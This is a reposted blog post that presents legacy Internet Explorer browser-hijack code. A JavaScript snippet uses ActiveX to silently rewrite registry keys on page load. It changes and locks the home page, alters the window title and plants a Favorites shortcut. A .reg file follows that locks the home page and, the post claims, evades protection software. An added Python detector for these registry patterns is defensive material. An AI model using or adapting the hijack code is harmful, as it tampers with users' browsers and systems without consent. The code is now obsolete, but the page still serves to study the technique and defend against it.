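This code mainly modifies registry entries from JavaScript. All antivirus products have since blacklisted it, and the string F935DC26-1CF0-11D0-ADB9-00C04FD58A0B used in the code no longer exists on current computers, but analyzing the code is still instructive. The code is as follows: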
```html
<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
// Create a .URL shortcut named DispName in folder loc, pointing at SiteURL
function AddFavLnk(loc, DispName, SiteURL)
{
    var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
    Shor.TargetPath = SiteURL;
    Shor.Save();
}
function f(){
    try
    {
        // ActiveX initialization
        a1=document.applets[0];
        // Shl: shell object (used for RegWrite and CreateShortcut)
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();
        Shl = a1.GetObject();
        // FSO: file system object (used for folder lookups)
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        a1.createInstance();
        FSO = a1.GetObject();
        // Net: network object (used for UserName)
        a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();
        Net = a1.GetObject();
        try
        {
            // Run only if the "Chg" cookie has not been set yet
            if (document.cookie.indexOf("Chg") == -1)
            {
                // Set the cookie
                var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
                document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
                // Cookie set
                // Set the home page
                Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://sucre.javaeye.com/");
                // Change the browser window title
                Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "你的Internet Explorer已经被修改过了 By Sucre");
                // Lock the browser home page
                Shl.RegWrite("HKCR\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\@","'\"C:\\Program Files\\Internet Explorer\\IExplore.exe\"' http://sucre.javaeye.com");
                // Set the cookie
                var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
                document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
                // Locate the Favorites folder and add a shortcut to it
                var WF, Shor, loc;
                WF = FSO.GetSpecialFolder(0);
                loc = WF + "\\Favorites";
                if(!FSO.FolderExists(loc))
                {
                    loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
                    if(!FSO.FolderExists(loc))
                    {
                        return;
                    }
                }
                AddFavLnk(loc, "我的博客", "http://sucre.blog.51cto.com");
            }
        }
        catch(e)
        {}
    }
    catch(e)
    {}
}
function init()
{
    // Call f() one second after the page loads
    setTimeout("f()", 1000);
}
init();
</script>
```
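In fact, the home page can also be locked with other kinds of script, such as a batch file. The code below locks the home page, so that IE shows the specified page as soon as it is opened; no protection software raises an alert for this way of redirecting it. The code is as follows: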
```
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
@="\"C:\\Program Files\\Internet Explorer\\IExplore.exe\" http://sucre.blog.51cto.com"
```
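As an added example (not code from the original post): a Python check that parses a `.reg` export and flags the two patterns shown on this page, an `OpenHomePage` command line that carries a URL argument and a `Window Title` value under `Internet Explorer\Main`. The function names and the sample export are constructed for illustration, and treating a URL in the command line as suspicious is a heuristic assumption.

```python
import re

# One string value line of a .reg file: @="..." or "Name"="..."
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")="((?:[^"\\]|\\.)*)"$')
URL_RE = re.compile(r'\b(?:https?|ftp)://\S+', re.IGNORECASE)

def unescape(s):
    """Undo .reg escaping of backslash and double quote."""
    return re.sub(r'\\(.)', r'\1', s)

def parse_reg(text):
    """Return {key_path: {value_name: string}}; '@' is the default value."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            current = keys.setdefault(line[1:-1], {})
        elif current is not None and (m := VALUE_RE.match(line)):
            name = m.group(1)
            name = '@' if name == '@' else unescape(name[1:-1])
            current[name.lower()] = unescape(m.group(2))  # names are case-insensitive
    return keys

def find_homepage_hijack(text):
    """Return (key, value_name, data) for each pattern shown on this page."""
    findings = []
    for key, values in parse_reg(text).items():
        k = key.lower()
        # OpenHomePage verb whose command line carries a URL argument
        if k.endswith(r'\shell\openhomepage\command'):
            cmd = values.get('@', '')
            if URL_RE.search(cmd):
                findings.append((key, '@', cmd))
        # A custom window title written under Internet Explorer\Main
        if k.endswith(r'\internet explorer\main') and 'window title' in values:
            findings.append((key, 'Window Title', values['window title']))
    return findings

# Constructed sample export; the first key repeats the .reg content above.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]
@="\"C:\\Program Files\\Internet Explorer\\IExplore.exe\" http://sucre.blog.51cto.com"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="about:blank"
"Window Title"="constructed title"
'''

if __name__ == '__main__':
    for finding in find_homepage_hijack(SAMPLE):
        print(finding)
```

Exports written by regedit are UTF-16, so decode the file before passing its text to `find_homepage_hijack`. The `Start Page` value is not flagged because any URL can be legitimate there; compare it against a known baseline instead.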
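The text above is for study and discussion only; do not use it for illegal purposes, or you bear the consequences yourself!
Reposted from: https://blog.51cto.com/sucre/380581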